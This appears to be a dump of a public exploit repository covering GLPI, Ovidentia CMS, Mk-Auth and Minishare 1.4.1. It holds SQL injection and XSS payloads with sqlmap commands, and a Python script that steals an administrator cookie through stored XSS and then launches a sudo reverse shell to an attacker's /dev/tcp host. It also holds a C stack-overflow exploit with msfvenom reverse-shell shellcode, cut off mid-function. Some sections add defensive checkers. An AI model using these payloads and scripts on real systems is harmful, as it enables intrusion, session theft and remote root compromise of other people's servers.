├── README.md
├── cms
│   ├── GLPI
│   │   ├── GLPI-stored-XSS
│   │   │   └── README.md
│   │   └── dashboard-plugin
│   │       └── README.md
│   └── ovidentia
│       ├── exploitSQLIOvidentia.txt
│       └── exploitXSSOvidentia.txt
├── mk-auth
│   ├── Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf
│   └── xss2root.py
└── windows
    └── servers
        └── minishare
            └── minishare_141_xpl.c
/README.md:
--------------------------------------------------------------------------------
## Public Exploits

This repository contains public exploits written by UserX and N3k00n3.

## Exploits

* CMS
    * [XSS - Ovidentia 8.4.3](./cms/ovidentia/exploitXSSOvidentia.txt)
    * [SQLi - Ovidentia 8.4.3](./cms/ovidentia/exploitSQLIOvidentia.txt)
    * [Stored XSS - GLPI plugin metadata](./cms/GLPI/GLPI-stored-XSS/README.md)
    * [Information disclosure - GLPI Dashboard plugin](./cms/GLPI/dashboard-plugin/README.md)
* Mk-Auth
    * [RCE via profile photo upload](./mk-auth/Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf)
    * [Stored XSS to root](./mk-auth/xss2root.py)
* Servers
    * [Minishare 1.4.1](./windows/servers/minishare/minishare_141_xpl.c)

--------------------------------------------------------------------------------
/cms/GLPI/GLPI-stored-XSS/README.md:
--------------------------------------------------------------------------------
# Stored XSS via plugin metadata

Author: Fernando Pinheiro
GLPI version: >= 9.5.4

It was possible to insert JavaScript code into a plugin's metadata fields (author, version, license, and so on).

Once the plugin is placed in the plugins folder at /glpi/plugins, that code is loaded during the GLPI plugin installation: GLPI reads the metadata from the plugin file and does not sanitize it before rendering it in the plugin list.

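The check an administrator would want before dropping a third-party plugin into /glpi/plugins, as an added example that is not part of the advisory or of GLPI: it pulls the string literals out of a plugin's `plugin_version_<name>()` metadata function, flags values that carry markup or event handlers, and shows what the safe (HTML-escaped) rendering of such a value looks like. The `setup.php` source below is constructed for this example; the regexes assume the usual `'key' => 'value'` array layout of GLPI plugins and skip non-literal values such as constants.

```python
import html
import re

# Constructed sample of a plugin's setup.php (not a real plugin, not code
# from the advisory): the 'author' field carries an HTML/JS payload where
# a name is expected. GLPI reads these values from plugin_version_<name>().
SAMPLE_SETUP_PHP = r"""<?php
define('PLUGIN_EVIL_VERSION', '1.0.0');

function plugin_version_evil() {
   return [
      'name'           => 'Evil Plugin',
      'version'        => PLUGIN_EVIL_VERSION,
      'author'         => '<img src=x onerror=alert(document.cookie)>',
      'license'        => 'GPLv2+',
      'homepage'       => 'https://example.invalid/evil',
      'minGlpiVersion' => '9.5',
   ];
}
"""

# function plugin_version_<name>() { ... }   (body ends at the first "}" in column 0)
FUNC_RE = re.compile(r"function\s+plugin_version_(\w+)\s*\([^)]*\)\s*\{(.*?)\n\}", re.S)
# 'key' => 'literal value'  (string literals only; constants such as PLUGIN_EVIL_VERSION are skipped)
META_RE = re.compile(r"""(['"])(\w+)\1\s*=>\s*(['"])(.*?)\3""")
# Fragments that matter once the value is echoed into HTML unescaped.
UNSAFE_RE = re.compile(r"""[<>"]|\bon\w+\s*=|javascript:""", re.I)


def extract_plugin_metadata(php_source):
    """Return {plugin_name: {key: value}} for every plugin_version_<name>() in the source."""
    plugins = {}
    for match in FUNC_RE.finditer(php_source):
        name, body = match.group(1), match.group(2)
        plugins[name] = {key: value for _q1, key, _q2, value in META_RE.findall(body)}
    return plugins


def find_unsafe_metadata(plugins):
    """List (plugin, key, value) triples that would inject markup if rendered unescaped."""
    return [(plugin, key, value)
            for plugin, fields in plugins.items()
            for key, value in fields.items()
            if UNSAFE_RE.search(value)]


def render_safely(value):
    """What the plugin list should print: the value HTML-escaped, so it displays as text."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    found = extract_plugin_metadata(SAMPLE_SETUP_PHP)
    for plugin, key, value in find_unsafe_metadata(found):
        print(f"[!] {plugin}.{key} = {value!r}")
        print(f"    safe rendering: {render_safely(value)}")
```

Run it over every `plugins/*/setup.php` before enabling a plugin; a hit in `author`, `homepage` or `license` is exactly the kind of value the advisory describes being rendered without escaping.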
--------------------------------------------------------------------------------
/cms/GLPI/dashboard-plugin/README.md:
--------------------------------------------------------------------------------
# Information Disclosure
Plugin Name: DashBoard
Plugin Version: <=1.0.2

This follows the post about [GLPI log files](https://medium.com/@emmapinheiro42/glpi-pesquisa-parte-02-1cb3a2b95a92), which are usually left behind with read permissions and are a great help for user enumeration.

Today I will show an interesting way to see that same information while authenticated as a user with few privileges, a bypass for when that file has the proper protections in place.

GLPI allows the use of plugins, which can be found in several places, most commonly on GitHub and on the [official plugin site](https://plugins.glpi-project.org/#/).

If we search for Dashboard, we find one of the plugins most used by those who deploy GLPI. This plugin is written and maintained by [stdonato](https://github.com/stdonato/glpi-dashboard/).

The path for GLPI plugins is the plugins folder:
https://example.com/glpi/plugins/

This folder is generally used after the GLPI installation and then forgotten, never protected; with directory listing enabled, enumerating the plugins in use becomes easy.

Having noticed that the dashboard plugin exists, it is possible to view the last 10 events. A regular user has no direct access to the file glpi/front/event.php, but can now read those same events through the file main2.php located at /plugins/dashboard/front/main2.php.

Besides the events, low-privileged users also gain access to other useful information that they should not be able to see, for example:

* who is currently connected
* who the application's technicians are, through the tickets opened by them in the tech category
* the latest tickets from other clients
* how many users currently exist in the database

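The two checks described above, plugin enumeration through the browsable plugins folder and the low-privilege read of the dashboard page, as an added example that is not part of the write-up or of the plugin: it parses an autoindex-style listing for plugin directories, then compares what one low-privileged session can read on the core `front/event.php` versus `plugins/dashboard/front/main2.php`. The directory listing is constructed for this example; the base URL and cookie are placeholders, and treating "200 without the `login_name` form field" as readable is an assumption about GLPI's login page.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Constructed /glpi/plugins/ directory listing in Apache autoindex style
# (built for this example, not captured from a real host).
SAMPLE_LISTING = """<html><head><title>Index of /glpi/plugins</title></head><body>
<h1>Index of /glpi/plugins</h1>
<pre><a href="?C=N;O=D">Name</a>
<a href="/glpi/">Parent Directory</a>
<a href="dashboard/">dashboard/</a>
<a href="fusioninventory/">fusioninventory/</a>
<a href="README.md">README.md</a>
</pre></body></html>"""

# Relative links that end in "/" are sub-directories, i.e. installed plugins.
PLUGIN_DIR_RE = re.compile(r'href="([A-Za-z0-9_.\-]+)/"')

# The core page a low-privileged session should not be able to read, and the
# plugin page that exposes the same events (path from the write-up).
CORE_EVENTS = "front/event.php"
PLUGIN_PAGES = {"dashboard": "plugins/dashboard/front/main2.php"}


def listing_enabled(status, body):
    """A 200 carrying an autoindex page means the plugins folder is browsable."""
    return status == 200 and "Index of" in body


def enumerate_plugins(listing_html):
    return PLUGIN_DIR_RE.findall(listing_html)


def reachable(status, body):
    """Readable when it answers 200 and is not GLPI's login form
    (assumption: the form carries the login_name field)."""
    return status == 200 and 'name="login_name"' not in body


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # A redirect to the login page must count as "blocked", so never follow it.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url, cookie, timeout=10):
    """GET with the low-privileged session cookie; returns (status, body). Network only."""
    opener = urllib.request.build_opener(_NoRedirect())
    req = urllib.request.Request(url, headers={"Cookie": cookie, "User-Agent": "glpi-plugin-check"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check_low_priv_access(fetch, base_url, cookie, plugins):
    """For the given session, report which pages are readable: {label: bool}."""
    probes = {"core event log": CORE_EVENTS}
    probes.update({f"{p} plugin": PLUGIN_PAGES[p] for p in plugins if p in PLUGIN_PAGES})
    return {label: reachable(*fetch(urljoin(base_url, path), cookie))
            for label, path in probes.items()}


def is_bypass(results):
    """True when the core page is blocked but a plugin page exposes it anyway."""
    core = results.get("core event log", True)
    return (not core) and any(v for k, v in results.items() if k != "core event log")


if __name__ == "__main__":
    base = "https://example.com/glpi/"               # placeholder target
    session = "glpi_sess=<low-privileged-session>"   # placeholder cookie
    status, body = http_fetch(urljoin(base, "plugins/"), session)
    plugins = enumerate_plugins(body) if listing_enabled(status, body) else list(PLUGIN_PAGES)
    results = check_low_priv_access(http_fetch, base, session, plugins)
    print(results, "BYPASS" if is_bypass(results) else "ok")
```

The fetch function is injected so the same logic runs against a live host or against canned responses; when the listing is disabled the script still probes the dashboard path, since the plugin folder name is fixed.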
--------------------------------------------------------------------------------
/cms/ovidentia/exploitSQLIOvidentia.txt:
--------------------------------------------------------------------------------
#-------------------------------------------------------
# Exploit Title: Ovidentia CMS - SQL Injection (Authenticated)
# Date: 06/05/2019
# [ CVE-2019-13978 ]
# Exploit Author:
#    Fernando Pinheiro (n3k00n3)
#    Victor Flores (UserX)
# Vendor Homepage: https://www.ovidentia.org/
# Version: 8.4.x up to and including 8.6.4 (see changelog)
# Tested on: macOS, Linux - Firefox, Safari
# Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------

POC

Path: /ovidentia/index.php?tg=delegat&idx=mem&id=1
Type: GET
Vulnerable Field: id
Payload:
1. (boolean-based) tg=delegat&idx=mem&id=1 AND 3152=(SELECT (CASE WHEN (3152=3152) THEN 3152 ELSE (SELECT 9962 UNION SELECT
2. (time-based)    tg=delegat&idx=mem&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QwTg)

URL: https://target/ovidentia/index.php?tg=delegat&idx=mem&id=1

Using a request file (req holds the captured authenticated GET, session cookie included)
sqlmap.py -r req --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs

Using GET (--cookie takes the Cookie header value itself, without the "Cookie: " prefix)
./sqlmap.py -u 'http://target/ovidentia/index.php?tg=delegat&idx=mem&id=1' --cookie "OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs

---

[CHANGELOG]

4th of August of 2019 - Ovidentia 8.6.4 tested and failed to prevent the attack, therefore still vulnerable.

--------------------------------------------------------------------------------
/cms/ovidentia/exploitXSSOvidentia.txt:
--------------------------------------------------------------------------------
#-------------------------------------------------------
# Exploit Title: Ovidentia CMS - XSS (Ovidentia 8.4.3)
# Stored and reflected XSS; PoCs below.
# Date: 06/05/2019
# [ CVE-2019-13977 ]
# Exploit Author:
#    Fernando Pinheiro (n3k00n3)
#    Victor Flores (UserX)
# Vendor Homepage: https://www.ovidentia.org/
# Version: 8.4.3 <= 8.6.4
# Tested on: macOS, Linux - Firefox, Safari
# Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------

POC

>========================================================
Stored XSS
>========================================================

1. POST http://TARGET/ovidentia/index.php?tg=groups
   Field:
      nom
2. POST http://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
   Fields:
      Nom
      Description
3. GET http://TARGET/ovidentia/index.php?tg=delegat
   Show groups
4. POST http://TARGET/ovidentia/index.php?tg=site&idx=create
   http://TARGET/ovidentia/index.php?tg=site&item=4
   Fields:
      Nom
      address
      description
5. POST http://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1
   Fields:
      Libellé du champ (field label)
   Triggered at:
      http://TARGET/ovidentia/index.php?tg=forums&idx=notices
      http://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1
      http://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1
6. POST http://TARGET/ovidentia/index.php?tg=notes&idx=Create
   Fields: Notes
   Triggered at:
      http://TARGET/ovidentia/index.php?tg=notes&idx=List

7. POST http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add
   Fields: all
   Triggered at:
      http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2


>========================================================
REFLECTED
>========================================================

1. GET http://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E


---


[CHANGELOG]

4th of August of 2019 - Ovidentia 8.6.4 tested and failed to prevent the attack, therefore still vulnerable.

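A way to verify the reflected PoC above and to re-test it after a patch, as an added example that is not part of the advisory: it rebuilds the `tg=admoc&idx=addoc&item=...` URL from the advisory's payload and classifies how the payload comes back in the response, distinguishing a verbatim reflection from a fully entity-encoded one, from one where only the tags were encoded but the double quote survived (still an attribute break-out), and from a filtered reflection that needs a manual look. For the stored cases it also derives a per-field payload so the alert names the field that fired. The response bodies are constructed for this example, not captured from Ovidentia.

```python
import html
import urllib.parse

# Reflected PoC from the advisory: the payload closes a double-quoted attribute value and
# injects an <img> whose onerror handler runs.
PAYLOAD = '"><img src=x onerror=alert(1)>'


def tagged_payload(field):
    """Variant for stored XSS: each field gets its own marker, so the alert names the sink that fired."""
    return f'"><img src=x onerror=alert(\'{field}\')>'


def build_probe_url(base_url, param, payload=PAYLOAD, fixed=None):
    """Rebuild the advisory's reflected URL: fixed params (tg, idx) plus the probed one."""
    query = dict(fixed or {})
    query[param] = payload
    return base_url + "?" + urllib.parse.urlencode(query)


def classify_reflection(body, payload=PAYLOAD):
    """How did the payload come back?
    unescaped        - verbatim; the handler would run
    escaped          - entity-encoded, including the quote; rendered as text
    quotes-unescaped - tags encoded but the double quote survived; attribute break-out still possible
    transformed      - the marker is there but the payload was altered; inspect by hand
    absent           - not reflected"""
    if payload in body:
        return "unescaped"
    full = html.escape(payload, quote=True)
    if full in body or full.replace("&quot;", "&#34;") in body:
        return "escaped"
    if html.escape(payload, quote=False) in body:
        return "quotes-unescaped"
    marker = payload.split("onerror=", 1)[1].rstrip(">")   # e.g. alert(1)
    if marker in body or html.escape(marker, quote=True) in body:
        return "transformed"
    return "absent"


# Constructed responses (not captured from Ovidentia), one per outcome.
SAMPLE_RESPONSES = {
    "vulnerable": '<input type="text" name="item" value=""><img src=x onerror=alert(1)>">',
    "fixed":      '<input type="text" name="item" value="&quot;&gt;&lt;img src=x onerror=alert(1)&gt;">',
    "partial":    '<input type="text" name="item" value=""&gt;&lt;img src=x onerror=alert(1)&gt;">',
    "filtered":   '<input type="text" name="item" value="&gt;img src=x onerror=alert(1)&gt;">',
    "clean":      '<p>Nothing reflected here.</p>',
}


def classify_samples():
    return {name: classify_reflection(body) for name, body in SAMPLE_RESPONSES.items()}


if __name__ == "__main__":
    print(build_probe_url("http://TARGET/ovidentia/index.php", "item",
                          fixed={"tg": "admoc", "idx": "addoc"}))
    for name, verdict in classify_samples().items():
        print(f"{name:10s} -> {verdict}")
```

`urlencode` emits `+` for spaces where the advisory used `%20`; both decode to the same request. The "quotes-unescaped" verdict is the one to watch after a vendor fix: encoding `<` and `>` alone does not close an attribute-context injection.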
--------------------------------------------------------------------------------
/mk-auth/Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kitsun3Sec/exploits/2901f6d654f3f0c4f58f43be04ef7bfdf552647c/mk-auth/Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf
--------------------------------------------------------------------------------
/mk-auth/xss2root.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
#
# 0day - Authenticated Stored XSS that leads to root!
#
# Flow (see show_help): log in as a regular client, open a support ticket
# ("chamado") whose message carries the stored XSS payload, wait on port 8081
# for the payload to send back the administrator's session cookie, then use
# that cookie against /admin/terminal.php to launch a reverse shell via sudo.
#
import base64
import getopt
import os
import re
import socket
import sys
import threading

import requests

kitsun3 = '''
@@@@@@@@@@@@@@@@&&@@@@@@@@@@@@@@@@@@@@@@@@@&&@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@&&&&&&&@@@@@@@@@@@@@@@@@@@@&&&&&&@@@@@@@@@@@@@
@@@@@@@@@@@@#&&&&&&&&@@@@@@@@@@@@@@@@@@@@&&&&&&&@@@@@@@@@@@@
@@@@@@@@@@@@&&&. .&&&&@@@@@@@@@@@@@@@@@@&&&. .&&&@@@@@@@@@@@
@@@@@@@@@@@&&&& &&&&&@@@@@@@@@@@@@@@&&&&& &&&&@@@@@@@@@@
@@@@@@@@@@@&&&.. ,%&&&&@%%%%%%%%%%%@&&&&&, ..&&&@@@@@@@@@@
@@@@@@@@@@&%%%..* *#%%%%*************%%%%%* *..%%%@@@@@@@@@@
@@@@@@@@%%%%%%.*******************************.%%%%%%@@@@@@@
@@@@@@@@%,..**************************************..%@@@@@@@
@@@@@@@@@%*.***************************************%@@@@@@@@
@@@@@@@%%.(#.*************,*******,*************.,(.%%@@@@@@
@@@@@@@%..,,.*.****((****, ,*****, ,****/#****.*..,..%@@@@@@
@@@@@@@@@%*...*****%&&*****************#&&*****...*%@@@@@@@@
@@@@@@@@%%%%%%..****(&&***************&&%****..%%%%%%@@@@@@@
@@@@@@@@@%*......******&*************&/*****......*%@@@@@@@@
@@@@@@@@@@@@@@%###..,********************,.###%@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@%%.***************.(&@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%.***********.%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@%.*********.%@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@#.&&&&&.#@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%@@@@@@@@@@@@@@@@@@@@@@@@@@@
'''

target = ''
cookies = ''
user = ''
password = ''
local_port = ''
local_ip = ''
admin_cookie = 'Kitsun3Sec'   # placeholder until the real admin cookie arrives
payload = ''                  # stored XSS payload; left empty in the repository

# The Referer is filled in by main() once the target is known.
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Pragma": "no-cache", "Cache-Control": "no-cache"}


def show_help():
    print("\n\t*********************************")
    print("\t MK-Auth Exploit by Kitsun3Sec ")
    print("\t By: alacerda (velocista) ")
    print("\t Thanks to: fcsantos (shadow) ")
    print("\t*********************************")
    print("\nINFO:\n\nThis exploit opens up a temporary listener on port 8081 to steal the Administrator's auth cookie and, after that, starts a netcat listener on the port chosen by the attacker and waits for the moment when the administrator opens the malicious message (a bad \"chamado\"). Once the Administrator opens the message, you will receive a root shell back!\n")
    print("Usage.: " + sys.argv[0] + " \n")
    print("ARGS:")
    print("\t-t:\t Target IP address (Mk-Auth IP)")
    print("\t-l:\t Local IP address (Your IP)")
    print("\t-p:\t Local PORT for Reverse Shell")
    print("\t-U:\t Username (valid client username)")
    print("\t-P:\t Password (valid password for the client)")
    print("\t-h:\t This help")

    print("\nEXAMPLE\n")
    print("If the target server has the IP address 192.168.25.136, your IP address is 192.168.25.137 and you want to receive the reverse shell on port 9090:\n")
    print("\t" + sys.argv[0] + " -t 192.168.25.136 -U myuser -P password123 -l 192.168.25.137 -p 9090")

    print("\n")
    sys.exit(0)


def open_reverse():
    """Run a reverse shell through the admin terminal using the stolen cookie."""
    url = target + "/admin/terminal.php"
    shell = "sudo bash -i >& /dev/tcp/" + local_ip + "/" + local_port + " 0>&1"
    goodEvil = base64.b64encode(shell.encode()).decode()
    # The sleep gives the netcat listener started in goingForTheKill() time to come up.
    data = {"comando": "sleep 5; echo " + goodEvil + " | base64 -d | bash", "terminal": "linux"}
    requests.post(url, headers=headers, cookies=admin_cookie, data=data)


def goingForTheKill():
    ists = threading.Thread(target=open_reverse)
    ists.start()
    os.system("nc -nlvp " + local_port)


def listen_admin_cookie():
    """Accept one connection on port 8081 and return whatever the XSS payload sent."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind(("", 8081))
        sock.listen(1)
        connection, client_address = sock.accept()
        with connection:
            return connection.recv(1024).decode(errors="replace")


def wait_admin():
    global admin_cookie

    while "centralmka2" not in admin_cookie:
        admin_cookie = listen_admin_cookie()

    # The second whitespace-separated token of the received data is expected to
    # carry "centralmka2=<sid>;mka=<value>", i.e. the admin's cookies.
    tmp = admin_cookie
    admin_cookie = {"centralmka2": tmp.split()[1].split('=')[1].split(';')[0], "mka": tmp.split()[1].split('=')[2]}

    print("We just received a cookie... Let's try it!")
    goingForTheKill()


def abrir_chamado():
    """Open a support ticket whose message body is the XSS payload."""
    url = target + "/central/suporte.php?page=ins_chamado"
    chamado_resp = requests.get(url, headers=headers, cookies=cookies)

    # The ticket number is pre-filled in the form (txt_chamado).
    protocolo = re.findall(r'.*txt_chamado" value="(.*)"', chamado_resp.text)
    if not protocolo:
        print("Could not find the ticket number (txt_chamado) in the page.")
        sys.exit(1)
    print("Chamado N.: " + protocolo[0])

    url = target + "/central/executar_central.php?acao=ins_chamado"
    data = {"assunto": "Financeiro", "msg": payload, "nome": "Kitsun3Sec", "email": "kitsun3@sec.br", "chamado": protocolo[0], "abertura": "22/03/2020 21:37:42"}
    criar_resp = requests.post(url, headers=headers, cookies=cookies, data=data)
    if criar_resp.status_code == 200:
        print("Payload sent. Let us wait for the admin token...")
        wait_admin()


def login():
    global cookies
    url = target + "/central/login.php"
    resp = requests.get(url, headers=headers)

    # Session cookie set by the login page
    cookies = resp.cookies

    # CSRF token embedded in the login form
    csrf_token = re.findall(r'.*token_central" value="(.*)"', resp.text)
    if not csrf_token:
        print("Could not find token_central in the login page.")
        sys.exit(1)

    url = target + "/central/executar_login.php"
    data = {"token_central": csrf_token[0], "txt_login": user, "txt_senha": password}
    login_resp = requests.post(url, headers=headers, cookies=cookies, data=data)

    # A 200 only means the request went through; a failed login may also answer 200.
    if login_resp.status_code == 200:
        print(" \\0/")
        print("We are logged in!")
        abrir_chamado()
    else:
        print("':( ")
        print("Login Failed! Are you sure your credential is valid?")


def main(argv):
    print(kitsun3)
    global target
    global user
    global password
    global local_port
    global local_ip

    try:
        opts, args = getopt.getopt(argv, "t:l:p:hU:P:")
    except getopt.GetoptError:
        show_help()

    for opt, arg in opts:
        if opt == '-h':
            show_help()
        # target
        elif opt == '-t':
            target = "http://" + arg
        # Local IP
        elif opt == '-l':
            local_ip = arg
        # Local port for reverse shell
        elif opt == '-p':
            local_port = arg
        elif opt == '-U':
            user = arg
        elif opt == '-P':
            password = arg
        else:
            show_help()

    if not all([target, local_ip, local_port, user, password]):
        show_help()

    headers["Referer"] = target + "/central/executar_login.php"
    login()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        show_help()
    main(sys.argv[1:])

--------------------------------------------------------------------------------
/windows/servers/minishare/minishare_141_xpl.c:
--------------------------------------------------------------------------------
/*
 * Exploit Title: Minishare 1.4.1 RCE exploit
 * Date: 17th of April of 2019
 * Exploit Author: Victor Vigel Flores
 * Vendor Homepage: https://sourceforge.net/projects/minishare/
 * Software Link: https://sourceforge.net/projects/minishare/
 * Version: 1.4.1
 * Tested on: Microsoft Windows 2000 ~ XP-SP3
 * CVE : 2004-2271
 *
 * Stack buffer overflow in the HTTP request path. The request is laid out as
 *   "GET " + BUFF_ERR_LENGTH bytes of filler + 4-byte per-target address
 *   + NOP sled + shellcode + 'B' padding + " HTTP/1.1\r\n\r\n"
 * so the saved return address is overwritten with targets[target] and
 * execution lands in the sled in front of the shellcode.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

#include <time.h>

#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#include <arpa/inet.h>

#define SA struct sockaddr
#define SA_IN struct sockaddr_in

#define BUFF_ERR_LENGTH 1787
#define PAYLOAD_LENGTH 2500

#define GET "GET "
#define HTTP " HTTP/1.1\r\n\r\n"

void generate_random_text(char * str, size_t size);
char * mount_payload(const int target);
int createSocket (const char * target, const int port);

/*
 * msfvenom -p windows/shell_reverse_tcp LHOST=X.X.X.X LPORT=1337
 * EXITFUNC=thread -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40"
 * -f c -v payload
 */
unsigned char pload[] =
"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xb7\xa7\xaa\x94\x83\xee\xfc\xe2\xf4\x4b\x4f\x28\x94\xb7\xa7"
"\xca\x1d\x52\x96\x6a\xf0\x3c\xf7\x9a\x1f\xe5\xab\x21\xc6\xa3"
"\x2c\xd8\xbc\xb8\x10\xe0\xb2\x86\x58\x06\xa8\xd6\xdb\xa8\xb8"
"\x97\x66\x65\x99\xb6\x60\x48\x66\xe5\xf0\x21\xc6\xa7\x2c\xe0"
"\xa8\x3c\xeb\xbb\xec\x54\xef\xab\x45\xe6\x2c\xf3\xb4\xb6\x74"
"\x21\xdd\xaf\x44\x90\xdd\x3c\x93\x21\x95\x61\x96\x55\x38\x76"
"\x68\xa7\x95\x70\x9f\x4a\xe1\x41\xa4\xd7\x6c\x8c\xda\x8e\xe1"
"\x53\xff\x21\xcc\x93\xa6\x79\xf2\x3c\xab\xe1\x1f\xef\xbb\xab"
"\x47\x3c\xa3\x21\x95\x67\x2e\xee\xb0\x93\xfc\xf1\xf5\xee\xfd"
"\xfb\x6b\x57\xf8\xf5\xce\x3c\xb5\x41\x19\xea\xcf\x99\xa6\xb7"
"\xa7\xc2\xe3\xc4\x95\xf5\xc0\xdf\xeb\xdd\xb2\xb0\x58\x7f\x2c"
"\x27\xa6\xaa\x94\x9e\x63\xfe\xc4\xdf\x8e\x2a\xff\xb7\x58\x7f"
"\xc4\xe7\xf7\xfa\xd4\xe7\xe7\xfa\xfc\x5d\xa8\x75\x74\x48\x72"
"\x3d\xfe\xb2\xcf\xa0\x9f\xb7\xfb\xc2\x96\xb7\xa2\x93\x1d\x51"
"\xcd\xba\xc2\xe0\xcf\x33\x31\xc3\xc6\x55\x41\x32\x67\xde\x98"
"\x48\xe9\xa2\xe1\x5b\xcf\x5a\x21\x15\xf1\x55\x41\xdf\xc4\xc7"
"\xf0\xb7\x2e\x49\xc3\xe0\xf0\x9b\x62\xdd\xb5\xf3\xc2\x55\x5a"
"\xcc\x53\xf3\x83\x96\x95\xb6\x2a\xee\xb0\xa7\x61\xaa\xd0\xe3"
"\xf7\xfc\xc2\xe1\xe1\xfc\xda\xe1\xf1\xf9\xc2\xdf\xde\x66\xab"
"\x31\x58\x7f\x1d\x57\xe9\xfc\xd2\x48\x97\xc2\x9c\x30\xba\xca"
"\x6b\x62\x1c\x4a\x89\x9d\xad\xc2\x32\x22\x1a\x37\x6b\x62\x9b"
"\xac\xe8\xbd\x27\x51\x74\xc2\xa2\x11\xd3\xa4\xd5\xc5\xfe\xb7"
"\xf4\x55\x41";

const char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90";


/* Per-target 4-byte address written over the saved return address. */
const char * targets[] = {
    "\xab\xa3\x54\x77", // Windows 2000 SP0->SP3 English
    "\x64\xf1\x17\x75", // Windows 2000 SP4 English
    "\x54\x1d\xab\x71", // Windows XP SP0-SP1 English
    "\x72\x93\xab\x71", // Windows XP SP2 English
    "\x4d\x3c\xc0\x71", // Windows 2003 SP0 English
    "\x80\x36\x40\x77", // Windows 2003 SP1 English
    "\x80\x26\x40\x77", // Windows 2003 SP2 English
    "\xf8\x29\xf3\x77", // Windows NT 4.0 SP6
    "\x0a\xaf\xd5\x77", // Windows XP SP2 German
    "\x6e\xe2\xd4\x77", // Windows XP SP2 Polish
    "\x0a\xaf\xd5\x77", // Windows XP SP2 French
    "\x53\x93\x3a\x7e"  // Windows XP SP3 French
};

/* Same order as targets[], for the usage message. */
const char * target_names[] = {
    "Windows 2000 SP0->SP3 English",
    "Windows 2000 SP4 English",
    "Windows XP SP0-SP1 English",
    "Windows XP SP2 English",
    "Windows 2003 SP0 English",
    "Windows 2003 SP1 English",
    "Windows 2003 SP2 English",
    "Windows NT 4.0 SP6",
    "Windows XP SP2 German",
    "Windows XP SP2 Polish",
    "Windows XP SP2 French",
    "Windows XP SP3 French"
};

#define NTARGETS ((int)(sizeof(targets) / sizeof(targets[0])))

int
createSocket(const char * target, const int port) {
    int sockfd = socket (AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror ("unable to create socket");
        exit(EXIT_FAILURE);
    }

    SA_IN hostaddr;
    bzero(&hostaddr, sizeof(hostaddr));
    hostaddr.sin_family = AF_INET;
    hostaddr.sin_addr.s_addr = inet_addr (target);
    hostaddr.sin_port = htons (port);

    if (connect (sockfd, (SA *)&hostaddr, sizeof (hostaddr)) != 0) {
        perror ("trying to reach the target");
        exit(EXIT_FAILURE);
    }
    return sockfd;
}

/* Fills str with `size` random letters; the caller must provide size + 1 bytes
 * because the terminator is written at str[size]. */
void
generate_random_text(char * str, size_t size) {
    const char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVXWYZabcdefghijklmnopqrstuvxwyz";

    srand(time(NULL));
    for (size_t i = 0; i < size; i++) {
        str[i] = alphabet[rand() % strlen(alphabet)];
    }
    str[size] = 0x00;
}

char *
mount_payload (const int target) {
